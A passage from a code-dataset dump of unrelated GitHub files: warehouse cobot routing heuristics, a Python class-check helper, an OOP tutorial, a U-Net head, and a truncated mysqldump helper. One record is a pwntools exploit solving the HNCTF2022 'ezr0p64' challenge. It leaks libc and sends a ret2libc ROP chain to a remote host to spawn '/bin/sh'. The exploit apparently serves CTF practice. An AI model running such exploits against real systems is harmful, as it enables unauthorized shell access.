batch_i_orders\n }\n\n batch_j_orders_weights = {\n order.ID: sum(\n [\n (\n len(batch_j.items_of_shelves[key])\n - order.chosen_shelves.get(key, 0)\n )\n == 0\n for key in batch_j.items_of_shelves.keys()\n ]\n )\n for order in batch_j_order\n }\n order_weights = {**batch_i_orders_weights, **batch_j_orders_weights}\n\n comb_weights = [sum([order_weights[order] for order in comb]) for comb in combs]\n if sum(comb_weights) == 0:\n probs = [1 / len(combs)] * len(combs)\n else:\n probs = np.array(comb_weights) / sum(comb_weights)\n orders = combs[np.random.choice(range(len(combs)), p=probs)]\n\n orders_i = [\n batch_i.orders[order]\n for order in set(batch_i.orders.keys()).intersection(orders)\n ]\n orders_j = [\n batch_j.orders[order]\n for order in set(batch_j.orders.keys()).intersection(orders)\n ]\n\n processed.append(orders)\n\n orders_i_weight = sum([order_i.weight for order_i in orders_i])\n orders_j_weight = sum([order_j.weight for order_j in orders_j])\n\n weight_diff = orders_i_weight - orders_j_weight\n\n if (\n weight_diff <= 0 and abs(weight_diff) <= self.batch_weight - batch_i.weight\n ) or (weight_diff > 0 and weight_diff <= self.batch_weight - batch_j.weight):\n for order_i in orders_i:\n batch_i.del_order(order_i, self.item_id_pod_id_dict)\n batch_j.add_order(order_i)\n self.greedy_cobot_tour(batch_j, items=order_i.items)\n for order_j in orders_j:\n batch_j.del_order(order_j, self.item_id_pod_id_dict)\n batch_i.add_order(order_j)\n self.greedy_cobot_tour(batch_i, items=order_j.items)\n if len(batch_i.items) == 0:\n self.batches.pop(batch_i.ID)\n batch_i = None\n if len(batch_j.items) == 0:\n self.batches.pop(batch_j.ID)\n batch_j = None\n self.align_station_utilization()\n if batch_i: self.local_search_shelves(batch_i)\n if batch_j: self.local_search_shelves(batch_j)\n return processed\n\n def swap_ps_of_batch(self):\n batches_per_ps = {\n ps: len(self.get_batches_for_station(ps)) for ps in self.warehouseInstance.OutputStations.keys()\n }\n ps = max(batches_per_ps, key=batches_per_ps.get)\n # savings_per_batch = {\n # key: sum(\n # [max(self.get_station_with_min_total_distance(order.ID).values())\n # for order in batch.orders.values()]\n # )\n # for key, batch in self.batches.items()\n # if batch.pack_station == ps\n # }\n # batch = min(savings_per_batch, key=savings_per_batch.get)\n # does this makes sense?\n # transformed = max(list(savings_per_batch.values()))-np.array(list(savings_per_batch.values()))\n # probs = transformed / sum(transformed)\n batch = np.random.choice(\n [batch.ID for batch in self.batches.values() if batch.pack_station == ps]\n )\n self.batches[batch].pack_station = str(\n np.random.choice(\n np.setdiff1d(\n list(self.warehouseInstance.OutputStations.keys()),\n [self.batches[batch].pack_station],\n )\n )\n )\n self.simulatedAnnealing(batch=self.batches[batch])\n\n def swap_order(self, k, processed):\n all_orders = [\n order for batch in self.batches.values() for order in batch.orders.values()\n ]\n all_order_feas = []\n for order in all_orders:\n if any([(self.batch_weight - batch.weight + order.weight) >= 0 for batch in self.batches.values()]):\n all_order_feas.append(order)\n\n frac_nodes_to_remove = {\n order: sum([\n (num_items_per_shelf - order.shelves.get(key, 0)) == 0\n for key, num_items_per_shelf in {\n key: len(x)\n for key, x in self.batches[order.batch_id].items_of_shelves.items()\n }.items()\n ]) / len(order.items)\n for order in all_order_feas\n }\n count = 0\n\n if all(np.array(list(frac_nodes_to_remove.values()))==0):\n probs = np.array([1/len(frac_nodes_to_remove)]*len(frac_nodes_to_remove))\n else:\n probs = np.array(list(frac_nodes_to_remove.values()))/sum(frac_nodes_to_remove.values())\n\n orders = np.random.choice(list(frac_nodes_to_remove.keys()), p=probs, size=min(k, len([x for x in probs if x > 0])), replace=False)\n assert all([order is self.batches[order.batch_id].orders[order.ID] for order in all_orders])\n for order in orders:\n # no clue why, but this has to be done, otherwise order becomes new object which causes all kinds of problems\n order = self.batches[order.batch_id].orders[order.ID]\n batch_to_remove_from = self.batches[order.batch_id]\n\n interactions = {\n batch: sum([\n any(set(item.shelves) & set(batch.route))\n for item in order.items.values()\n ]) for batch in self.batches.values()\n if batch.ID != order.batch_id and (self.batch_weight - (batch.weight + order.weight)) >= 0\n }\n if len(interactions)==0:\n continue\n if all(np.array(list(interactions.values())) == 0):\n probs = [1/len(interactions)] * len(interactions)\n else:\n probs = np.array(list(interactions.values()))/sum(interactions.values())\n\n batch_to_add_to = np.random.choice(list(interactions.keys()), p=probs)\n\n if order.weight < self.batch_weight - batch_to_add_to.weight:\n count += 1\n batch_to_remove_from.del_order(order, self.item_id_pod_id_dict)\n if len(batch_to_remove_from.items) == 0:\n self.batches.pop(batch_to_remove_from.ID)\n batch_to_remove_from.route = [\n x\n for x in batch_to_remove_from.route\n if x in list(batch_to_remove_from.items_of_shelves.keys())\n ]\n\n batch_to_add_to.add_order(order)\n self.greedy_cobot_tour(batch_to_add_to, items=order.items)\n self.align_station_utilization()\n self.local_search_shelves(batch_to_add_to)\n\n return processed\n\n def randomized_local_search(self, max_iters=10, k=1, lamb=0.7, alpha=0.9):\n \"\"\"\n perform simple randomized swap of orders to batches. This is done for a given number of iterations on\n randomly drawn orders.\n Neighborhood solution is accepted if it results in a better fitness value\n :return:\n \"\"\"\n print(\"local with k=\", k)\n iters = 0\n curr_fit = self.get_fitness_of_solution()\n curr_sol = copy.deepcopy(self.batches)\n best_fit = curr_fit\n best_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n processed = []\n operators = [self.swap_order, self.exchange_orders, self.determine_switchable_orders_randomized]\n weights = [1] * len(operators)\n T = 0.02 * curr_fit\n while iters < max_iters:\n operator_idx = np.random.choice(np.arange(0, len(operators)), p=np.array(weights)/sum(weights))\n operator = operators[operator_idx]\n processed = operator(k, processed)\n new_fit = self.get_fitness_of_solution()\n if self.get_fitness_of_solution() < curr_fit:\n curr_sol = copy.deepcopy(self.batches)\n curr_fit = self.get_fitness_of_solution()\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n processed = []\n if curr_fit < best_fit:\n best_sol = copy.deepcopy(self.batches)\n best_fit = curr_fit\n weights[operator_idx] = lamb * weights[operator_idx] + (1-lamb) * 5\n else:\n weights[operator_idx] = lamb * weights[operator_idx] + (1-lamb) * 3\n elif self.acceptWithProbability(new_fit, curr_fit, T):\n curr_sol = copy.deepcopy(self.batches)\n curr_fit = self.get_fitness_of_solution()\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n processed = []\n weights[operator_idx] = lamb * weights[operator_idx] + (1-lamb) * 1\n else:\n self.batches = copy.deepcopy(curr_sol)\n self.item_id_pod_id_dict = copy.deepcopy(item_id_pod_id_dict_copy)\n weights[operator_idx] = lamb * weights[operator_idx] + (1-lamb) * 1\n iters += 1\n T *= alpha\n # set to best solution\n\n for batch in self.batches.values():\n batch.__dict__ = best_sol[batch.ID].__dict__.copy()\n assert batch is self.batches[batch.ID]\n self.item_id_pod_id_dict = copy.deepcopy(self.item_id_pod_id_dict_orig)\n for batch in self.batches.values():\n for item in batch.items.values():\n self.item_id_pod_id_dict[item.orig_ID][item.shelf] -= 1\n\n def repair_negative_stock(self):\n class FindSlack:\n def __init__(self, slack, new_batch, item, shelf, item_id_pod_it_dict):\n self.slack = slack\n self.new_batch = new_batch\n self.item = item\n self.shelf = shelf\n self.item_id_pod_id_dict_c = item_id_pod_it_dict\n\n while True:\n blacklist = []\n for ik, item in self.item_id_pod_id_dict.items():\n for sk, shelf in item.items():\n if shelf < 0:\n blacklist.append((ik, sk))\n if len(blacklist) == 0:\n return\n for item_key, shelf_key in blacklist:\n slacks = []\n for bid, batch in self.batches.items():\n if item_key in [item.orig_ID for item in batch.items_of_shelves.get(shelf_key, [])]:\n prev_fitness = self.get_fitness_of_batch(batch)\n\n curr_batch = copy.deepcopy(batch)\n item_id_pod_it_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n\n self.local_search_shelves(batch, item_key, shelf_key)\n slacks.append(FindSlack(\n self.get_fitness_of_batch(batch)-prev_fitness,\n copy.deepcopy(batch),\n item_key,\n shelf_key,\n copy.deepcopy(self.item_id_pod_id_dict)\n ))\n\n batch.__dict__ = curr_batch.__dict__.copy()\n self.item_id_pod_id_dict = item_id_pod_it_dict_copy\n min_slack = min(slacks, key=attrgetter(\"slack\"))\n self.batches[min_slack.new_batch.ID].__dict__ = min_slack.new_batch.__dict__.copy()\n self.item_id_pod_id_dict = min_slack.item_id_pod_id_dict_c\n\n\n def local_search_shelves(self, batch: BatchNew, blacklist_item=None, blacklist_shelf=None):\n curr_batch = copy.deepcopy(batch)\n item_id_pod_it_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n if not self.is_storage_dedicated:\n\n batch.route = []\n self.replenish_shelves(batch)\n assigned = []\n while len(assigned) != len(batch.items):\n to_be_assigned = [\n item\n for item in batch.items.values()\n if item.ID not in [i.ID for i in assigned]\n ]\n shelves = [\n shelf\n for item in to_be_assigned\n for shelf in item.shelves\n if shelf not in batch.route\n and not (item.orig_ID == blacklist_item and shelf == blacklist_shelf)\n # and self.item_id_pod_id_dict[item.orig_ID][shelf] > 0\n ]\n shelf_counts = Counter(shelves)\n\n for a, b in itertools.combinations(shelf_counts, 2):\n if self.distance_ij[a, b] <= 0:\n shelf_counts[a], shelf_counts[b] = (\n shelf_counts[a] + shelf_counts[b],\n ) * 2\n # with 50 percent prob use the random draw method\n if np.random.random() < 1:\n # softmax probability\n sum_counts = sum([np.exp(count) for count in shelf_counts.values()])\n probs_shelves = {\n shelf: np.exp(count) / sum_counts\n for shelf, count in shelf_counts.items()\n }\n\n dists = {\n shelf: min(\n [\n self.distance_ij[node, shelf]\n for node in batch.route + [batch.pack_station]\n ]\n )\n for shelf in shelves\n }\n max_dist = max(dists.values())\n diff_dist = {\n shelf: max_dist - dist for shelf, dist in dists.items()\n }\n sum_diff_dist = sum(diff_dist.values())\n if sum_diff_dist == 0:\n probs_dist = {\n shelf: 1 / len(diff_dist) for shelf in diff_dist.keys()\n }\n else:\n probs_dist = {\n shelf: dist / sum_diff_dist\n for shelf, dist in diff_dist.items()\n }\n probs = {\n key: (probs_shelves[key] + probs_dist[key]) / 2\n for key in probs_shelves.keys()\n }\n\n top_shelf = np.random.choice(\n list(probs.keys()), p=list(probs.values())\n )\n # with 50 percent prob use the rank method\n else:\n rank = (\n pd.DataFrame.from_dict(\n shelf_counts, orient=\"index\", columns=[\"num_shelves\"]\n )\n .rank(method=\"min\", ascending=False)\n .merge(\n pd.DataFrame.from_dict(\n {\n shelf: min(\n [\n self.distance_ij[node, shelf]\n for node in batch.route\n + [batch.pack_station]\n ]\n )\n for shelf in shelves\n },\n orient=\"index\",\n columns=[\"distance\"],\n ).rank(method=\"min\", ascending=True),\n left_index=True,\n right_index=True,\n )\n )\n # random weights for randomization of shelf picks\n weight_1 = np.random.random()\n weight_2 = 1 - weight_1\n top_shelf = rank.apply(\n lambda x: np.average(x, weights=[weight_1, weight_2]), axis=1\n ).idxmin()\n\n items_in_top_shelf = [\n item for item in to_be_assigned if top_shelf in item.shelves and not (\n item.orig_ID == blacklist_item and top_shelf == blacklist_shelf\n )\n ]\n for item in items_in_top_shelf:\n # if self.item_id_pod_id_dict[item.orig_ID][top_shelf] > -10000:\n item.shelf = top_shelf\n self.item_id_pod_id_dict[item.orig_ID][top_shelf] -= 1\n assigned.append(item)\n batch.route.append(top_shelf)\n # batch_eh, batch_eh_copy = self.swap_ps(batch)\n batch_eh, batch_eh_copy = None, None\n if not blacklist_item: # dont call the function within recursion\n self.repair_negative_stock()\n # self.swap_ps(batch)\n self.simulatedAnnealing(batch=batch)\n if not self.get_fitness_of_batch(batch) < self.get_fitness_of_batch(curr_batch) and not blacklist_item: # dont revert solution in case we check blacklist impact\n batch.__dict__ = curr_batch.__dict__.copy()\n if batch_eh: batch_eh.__dict__ = batch_eh_copy.__dict__.copy()\n self.item_id_pod_id_dict = item_id_pod_it_dict_copy\n\n def swap_ps(self, batch_i):\n curr_fit = self.get_fitness_of_solution()\n for batch_j in [\n batch\n for batch in self.batches.values()\n if batch.pack_station != batch_i.pack_station\n ]:\n batch_i_copy = copy.deepcopy(batch_i)\n batch_j_copy = copy.deepcopy(batch_j)\n batch_i.pack_station = batch_j.pack_station\n batch_j.pack_station = batch_i.pack_station\n self.simulatedAnnealing(batch=batch_i)\n self.simulatedAnnealing(batch=batch_j)\n # self.tests()\n if self.get_fitness_of_solution() < curr_fit:\n return batch_j, batch_j_copy\n else:\n batch_i.__dict__ = batch_i_copy.__dict__.copy()\n batch_j.__dict__ = batch_j_copy.__dict__.copy()\n return None, None\n\n def reduce_number_of_batches(self, max_tries=3):\n tries = 0\n imp = False\n if not np.ceil(\n sum(\n [\n self.get_total_weight_by_order(order)\n for order in self.warehouseInstance.Orders.keys()\n ]\n )\n / 18\n ) < len(self.batches):\n print(\"Number of Batches at optimum\")\n else:\n processed = []\n while (\n np.ceil(\n sum(\n [\n self.get_total_weight_by_order(order)\n for order in self.warehouseInstance.Orders.keys()\n ]\n )\n / 18\n )\n < len(self.batches)\n and tries < max_tries\n ):\n\n reduced, destroy_batch = self.optimized_perturbation(already_destroyed=processed)\n processed.append(destroy_batch)\n if not reduced:\n # self.shake(1)\n tries += 1\n return imp\n\n def choose_batch_for_destruction(self, with_prob=False, already_destroyed=[]):\n num_batches_per_station = {\n pack_station: len(self.get_batches_for_station(pack_station))\n for pack_station in self.warehouseInstance.OutputStations\n }\n if any(\n [\n np.abs(v_1 - v_2) > 0\n for k_1, v_1 in num_batches_per_station.items()\n for k_2, v_2 in num_batches_per_station.items()\n if not k_1 == k_2\n ]\n ):\n ps_to_destroy_from = max(\n num_batches_per_station.keys(),\n key=(lambda k: num_batches_per_station[k]),\n )\n weight_dict = self.get_weight_per_batch(ps_to_destroy_from)\n else:\n weight_dict = self.get_weight_per_batch()\n if with_prob and len(weight_dict.values()) > 1:\n transformations = {key: max(weight_dict.values())-weight for key, weight in weight_dict.items()}\n probabilities = {key: trans/sum(transformations.values()) for key, trans in transformations.items()}\n destroy_batch = np.random.choice(list(probabilities.keys()), p=list(probabilities.values()))\n else:\n destroy_batch = np.random.choice(list(weight_dict.keys()))\n return destroy_batch\n\n def optimized_perturbation(self, already_destroyed=[]):\n print(\"try to minimize the number of batches\")\n destroy_batch = None\n improvement = True\n change = False\n curr_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n while improvement and np.ceil(\n sum(\n [\n self.get_total_weight_by_order(order)\n for order in self.warehouseInstance.Orders.keys()\n ]\n )\n / 18\n ) < len(self.batches):\n change = True\n destroy_batch = self.choose_batch_for_destruction(\n with_prob=False, already_destroyed=already_destroyed\n )\n orders_to_reassign = self.batches[destroy_batch].orders\n self.replenish_shelves(self.batches[destroy_batch])\n self.batches.pop(destroy_batch)\n # sort orders with respect to their weight in descending order (try to assign the biggest orders first)\n weight_of_orders = {\n k: v\n for k, v in sorted(\n orders_to_reassign.items(),\n key=lambda item: item[1].weight,\n reverse=True,\n )\n }\n # reassign all orders\n for order in weight_of_orders.values():\n candidate_batches = {}\n for key, batch in self.batches.items():\n candidate_batches[key] = order.weight + batch.weight\n if not candidate_batches:\n pass\n else:\n new_batch_of_item = min(\n candidate_batches.keys(), key=(lambda k: candidate_batches[k])\n )\n self.update_batches_from_new_order(\n new_order=order.ID, batch_id=new_batch_of_item\n )\n if all(\n [batch.weight <= self.batch_weight for batch in self.batches.values()]\n ):\n improvement = True\n else:\n improvement = self.repair()\n if improvement:\n print(\n f\"found solution with one batch less. Number of batches now is {len(self.batches)}\"\n )\n for batch in self.batches.values():\n if len(batch.route) == 0:\n self.greedy_cobot_tour(batch)\n # self.simulatedAnnealing(batch=batch)\n curr_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n # self.tests()\n else:\n self.batches = copy.deepcopy(curr_sol)\n self.item_id_pod_id_dict = copy.deepcopy(item_id_pod_id_dict_copy)\n return bool(improvement * change), destroy_batch\n\n def repair(self):\n improvement = True\n while (\n not all(\n [batch.weight <= self.batch_weight for batch in self.batches.values()]\n )\n and improvement\n ):\n improvement = False\n curr_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n inf_batch = next(\n batch for batch in self.batches.values() if batch.weight > self.batch_weight\n )\n for other_batch in [\n batch\n for batch in copy.deepcopy(self.batches).values()\n if batch.ID != inf_batch.ID\n ]:\n self.batches.pop(inf_batch.ID)\n slack = np.abs(inf_batch.weight - other_batch.weight)\n self.batches.pop(other_batch.ID)\n orders_of_batches = dict(\n **copy.deepcopy(inf_batch.orders),\n **copy.deepcopy(other_batch.orders),\n )\n batch1_orders, batch2_orders = self.kk(\n [i for i in orders_of_batches.values()]\n )\n batch1_orders = [\n i for i in orders_of_batches.values() if i.ID in batch1_orders\n ]\n batch2_orders = [\n i for i in orders_of_batches.values() if i.ID in batch2_orders\n ]\n b1_id = str(self.get_new_batch_id())\n b1 = BatchNew(b1_id, inf_batch.pack_station)\n [b1.add_order(order) for order in batch1_orders]\n self.batches.update({b1.ID: b1})\n b2_id = str(self.get_new_batch_id())\n b2 = BatchNew(b2_id, other_batch.pack_station)\n [b2.add_order(order) for order in batch2_orders]\n self.batches.update({b2.ID: b2})\n if all(\n [\n batch.weight <= self.batch_weight\n for batch in self.batches.values()\n ]\n ):\n return True\n elif np.abs(b1.weight - b2.weight) < slack:\n improvement = self.repair()\n return improvement\n else:\n self.batches = copy.deepcopy(curr_sol)\n self.item_id_pod_id_dict = copy.deepcopy(item_id_pod_id_dict_copy)\n return improvement\n\n def reduced_vns(self, max_iters, t_max, k_max):\n \"\"\"\n :param max_iters: maximum number of iterations\n :param t_max: maximum cpu time\n :param k_max: maximum number of different neighborhoods / shake operations to be performed\n \"\"\"\n iters = 0\n starttime = time.time()\n t = time.time() - starttime\n time_till_best = None\n curr_fit = self.get_fitness_of_solution()\n best_fit = curr_fit\n curr_sol = copy.deepcopy(self.batches)\n best_sol = copy.deepcopy(curr_sol)\n item_id_pod_id_dict_copy = copy.deepcopy(self.item_id_pod_id_dict)\n T = curr_fit * 0.05\n while iters < max_iters and t < t_max:\n print(\"Start iteration {} of VNS\".format(str(iters)))\n k = 1\n while k < k_max:\n self.shake(k)\n improvement = True\n while improvement:\n fit_before_ls = self.get_fitness_of_solution()\n self.reduce_number_of_batches(max_tries=3)\n self.randomized_local_search(max_iters=20, k=k)\n neighbor_fit = self.get_fitness_of_solution()\n print(\"curr fit: {}; cand fit {}\".format(curr_fit, neighbor_fit))\n if neighbor_fit < fit_before_ls:\n improvement = True\n else:\n improvement = False\n if (\n neighbor_fit < curr_fit\n ):\n self.tests()\n\n curr_fit = neighbor_fit # accept new solution\n\n curr_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(\n self.item_id_pod_id_dict\n )\n k = 1\n if curr_fit < best_fit:\n time_till_best = time.time() - starttime\n best_sol = copy.deepcopy(self.batches)\n best_fit = self.get_fitness_of_solution()\n T = best_fit * 0.0001\n elif self.acceptWithProbability(neighbor_fit, best_fit, T):\n curr_fit = neighbor_fit # accept new solution\n\n curr_sol = copy.deepcopy(self.batches)\n item_id_pod_id_dict_copy = copy.deepcopy(\n self.item_id_pod_id_dict\n )\n k += 1\n else:\n self.batches = copy.deepcopy(\n curr_sol\n ) # don´t accept new solution and stick with the current one\n self.item_id_pod_id_dict = copy.deepcopy(\n item_id_pod_id_dict_copy\n )\n improvement = False\n k += 1\n iters += 1\n t = time.time() - starttime\n\n self.batches = best_sol\n print(\"best fitness: \", best_fit)\n print(f\"took {time_till_best} seconds\")\n\n\nif __name__ == \"__main__\":\n SKUS = [\"24\", \"360\"] # options: 24 and 360\n SUBSCRIPTS = [\"\", \"_a\", \"_b\"] # , \"_a\", \"_b\"\n NUM_ORDERSS = [20] # [10,\n MEANS = [\"1x6\", \"5\"] # \"1x6\",, \"5\"\n instance_sols = {}\n model_sols = {}\n NUM_DEPOTS = 2\n for SKU in SKUS:\n for SUBSCRIPT in SUBSCRIPTS:\n for NUM_ORDERS in NUM_ORDERSS:\n for MEAN in MEANS:\n # CAUTION: SCRIPT WONT RUN IF ALL SOLUTIONS ARE WRITTEN AND THIS IS NOT PUT IN COMMENTS\n # if os.path.isfile('solutions/final/orders_{}_mean_5_sku_{}{}_{}.xml'.format(str(NUM_ORDERS), SKU, SUBSCRIPT, \"mixed\")):\n # continue # skip iteration if the instance has been solved already\n # try:\n layoutFile = r\"data/layout/1-1-1-2-1.xlayo\"\n\n podInfoFile = \"data/sku{}/pods_infos.txt\".format(SKU)\n instances = {}\n instances[24, 2] = r\"data/sku{}/layout_sku_{}_{}.xml\".format(\n SKU, SKU, NUM_DEPOTS\n )\n\n storagePolicies = {}\n storagePolicies[\"dedicated\"] = \"data/sku{}/pods_items_dedicated_1.txt\".format(SKU)\n # storagePolicies['mixed'] = 'data/sku{}/pods_items_mixed_shevels_1-5.txt'.format(SKU)\n # storagePolicies['mixed'] = 'data/sku{}/pods_items_mixed_shevels_1-10.txt'.format(SKU)\n\n orders = {}\n orders[\n \"{}_5\".format(str(NUM_ORDERS))\n ] = r\"data/sku{}/orders_{}_mean_{}_sku_{}{}.xml\".format(\n SKU, str(NUM_ORDERS), MEAN, SKU, SUBSCRIPT\n )\n input_files = [storagePolicies, instances, orders, layoutFile, podInfoFile]\n\n sols_and_runtimes = {}\n runtimes = [120]\n for runtime in runtimes:\n np.random.seed(1999851)\n if runtime == 0:\n ils = GreedyMixedShelves(input_files)\n ils.apply_greedy_heuristic()\n else:\n ils = VariableNeighborhoodSearch(input_files)\n STORAGE_STRATEGY = (\n \"dedicated\" if ils.is_storage_dedicated else \"mixed\"\n )\n print(\n \"Now optimizing: SKU={}; Order={}; Subscript={}; Mean={}; Storage={}\".format(\n SKU, NUM_ORDERS, SUBSCRIPT, MEAN, STORAGE_STRATEGY\n )\n )\n ils.reduced_vns(max_iters=100, t_max=runtime, k_max=4)\n # ils.perform_ils(num_iters=1500, t_max=runtime)\n # vns = VariableNeighborhoodSearch()\n # vns.reduced_vns(1500, runtime, 2)\n STORAGE_STRATEGY = (\n \"dedicated\" if ils.is_storage_dedicated else \"mixed\"\n )\n ils.write_solution_to_xml(\n \"solutions/orders_{}_mean_{}_sku_{}{}_{}.xml\".format(\n str(NUM_ORDERS), MEAN, SKU, SUBSCRIPT, STORAGE_STRATEGY\n )\n )\n # sols_and_runtimes[runtime] = (vns.get_fitness_of_solution(), {batch.ID: batch.route for\n # batch in vns.batches.values()})\n print(sols_and_runtimes)\n instance_sols[(SKU, SUBSCRIPT, NUM_ORDERS)] = sols_and_runtimes\n model_sols[\n (SKU, SUBSCRIPT, NUM_ORDERS, \"ILS\")\n ] = ils.get_fitness_of_solution()\n # model_sols[(SKU, SUBSCRIPT, NUM_ORDERS, \"VNS\")] = vns.get_fitness_of_solution()\n # except Exception as e:\n # print(e)\n # continue\n\n # with open('../analyse_solution/solutions/mixed360_random_ls_not_random_twoopt.pickle', 'wb') as handle:\n # pickle.dump(instance_sols, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(\n \"../analyse_solution/solutions/mixed_fitness_ils_vns.pickle\", \"wb\"\n ) as handle:\n pickle.dump(model_sols, handle, protocol=pickle.HIGHEST_PROTOCOL)\n","repo_name":"LTluttmann/cobot_shortest_path","sub_path":"instance_demo/agv_routing_mixed.py","file_name":"agv_routing_mixed.py","file_ext":"py","file_size_in_byte":72481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4478319291","text":"#!/usr/bin/python3\n\n\"\"\"Defining a function that checks\n an object belongs to a class or is inherited\n\"\"\"\n\n\ndef is_kind_of_class(obj, a_class):\n \"\"\"\n Checks if object is an instance of class, or if the object is an instance\\\n of a class that inherited from\n\n Args:\n obj (object): The object to be tested for membership to a class\n a_class (class): The class\n\n Return: True or false\n\n Raises:\n typeError\n \"\"\"\n if not isinstance(a_class, type):\n raise TypeError(\"a_class type must be type\")\n if isinstance(obj, a_class) or issubclass(type(obj), a_class):\n return True\n return False\n","repo_name":"Muna-Redi/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/3-is_kind_of_class.py","file_name":"3-is_kind_of_class.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25103377811","text":"#------------- constructor -----------\r\n\r\nclass Emp:\r\n no_of_leave = 5\r\n\r\n #self:- self vo intance hoga jes per vo function lagaya ja raha hai\r\n def info_printer(self):\r\n return f\"Employee name is {self.name} and salary is {self.sal} and roll is {self.roll}\"\r\n #yeha self ka matalab object eg:- agar ham info_printer me deepak dalte hai to vo\r\n #deepak.name deepak.sal ho je ga yane jah aself vaha deepak\r\n\r\n #----------- __init__ -----------\r\n #it is used to make instance so we have not to writte again and agin down\r\n def __init__(self , aname , asal , aroll ):\r\n self.name = aname \r\n self.sal = asal\r\n self.roll = aroll\r\n\r\n#__init__ method for making instance from object\r\nkunal = Emp(\"kunal\" , 900 , \"programmer\")\r\n\r\nprint(kunal.info_printer())\r\n\r\n\r\n#old method\r\n'''#-------------- object ----------------\r\nankit = Emp() \r\ndeepak = Emp()\r\n\r\n#--------------- instance variabels-------------- \r\nankit.name = \"ankit\"\r\nankit.sal = 500\r\nankit.roll = \"HR\"\r\n\r\ndeepak.name = \"ankit\"\r\ndeepak.sal = 600\r\ndeepak.roll = \"employee\"'''\r\n\r\n\r\n#deepak.info_printer me deepak info_printer self ke tor pe arrgumnet hai\r\n\r\n#making obejct and giving instance to Emp\r\n","repo_name":"ankit-programming/python_prac","sub_path":"python programming/cui/oops/oops4 (self & __init__() constructor).py","file_name":"oops4 (self & __init__() constructor).py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17163412320","text":"from pwn import *\r\nfrom LibcSearcher import *\r\nimport sys\r\nremote_addr = [\"43.143.7.97\",28919]\r\nlibc=ELF('./libc.so.6')\r\nif len(sys.argv) == 1:\r\n context.log_level=\"debug\" \r\n #p = process([\"qemu-aarch64\", \"-L\", \"/usr/aarch64-linux-gnu/\", \"-g\",\"1234\",\"./stack\"]) \r\n #p = process([\"qemu-aarch64\", \"-L\", \".\", \"./stack\"]) \r\n p = process(\"./ezrop64\")\r\n context(arch='amd64', os='linux')\r\nif len(sys.argv) == 2 :\r\n if 'r' in sys.argv[1]:\r\n p = remote(remote_addr[0],remote_addr[1])\r\n if 'n' not in sys.argv[1]:\r\n context.log_level=\"debug\" \r\n #context(arch = 'amd64', os = 'linux')\r\nr = lambda : p.recv()\r\nrl = lambda : p.recvline()\r\nrc = lambda x: p.recv(x)\r\nru = lambda x: p.recvuntil(x)\r\nrud = lambda x: p.recvuntil(x, drop=True)\r\ns = lambda x: p.send(x)\r\nsl = lambda x: p.sendline(x)\r\nsa = lambda x, y: p.sendafter(x, y)\r\nsla = lambda x, y: p.sendlineafter(x, y)\r\nshell = lambda : p.interactive()\r\npr = lambda name,x : log.info(name+':'+hex(x))\r\n\r\n#gdb.attach(p)\r\npop_rdi = 0x4012a3\r\nret = 0x40101a\r\nru(b'rop.\\n')\r\nputs_addr = int(p.recvline()[-15:-1],16)\r\npr('puts_addr',puts_addr)\r\n\r\nlibc_base = puts_addr - libc.symbols['puts']\r\nsystem_addr = libc_base + libc.symbols['system']\r\nbinsh_addr = libc_base + next(libc.search(b'/bin/sh'))\r\npr('libc_base',libc_base)\r\n\r\npayload = b'a' * (0x100 + 8) + p64(ret) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)\r\nsl(payload)\r\n\r\nshell()\r\n","repo_name":"BattiestStone4/pwn-problems","sub_path":"HNCTF2022_ezr0p64/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"36843896166","text":"import torch\nimport torch.nn as nn\nclass Unet_Head(nn.Module):\n def __init__(self, num_keypoint=16, mode='train'):\n super(Unet_Head, self).__init__()\n\n self.mode = mode\n\n self.init_weight()\n\n self.header_heatmaps = nn.Sequential(*[\n nn.Conv2d(16, num_keypoint, 1, 1, 0, bias=True),\n nn.Sigmoid()\n ])\n\n def init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n # m.weight.data.normal_(0, 0.01)\n torch.nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n # torch.nn.init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def forward(self, x):\n\n res = []\n h1 = self.header_heatmaps(x)\n res = h1\n return res\n","repo_name":"hanpier/keypoint","sub_path":"lib/models/head/Unet_head.py","file_name":"Unet_head.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6973998980","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport re\n\nimport pymysql\nimport six\n\n\ndef get_mysqldump_args_and_env_from_url(url):\n \"\"\"\n Constructs list of command line arguments and dictionary of environment\n variables that can be given to `mysqldump` executable to obtain database\n dump of the database described in given URL.\n\n :param url: Parsed database URL.\n :type url: urllib.urlparse.ParseResult\n\n :return: List of command line arguments as well as dictionary of\n environment variables that can be used to launch the MySQL dump\n process to obtain dump of the database.\n :rtype: tuple[list[str],dict[str,str]]\n \"\"\"\n args = [\n # Without this, `INSERT 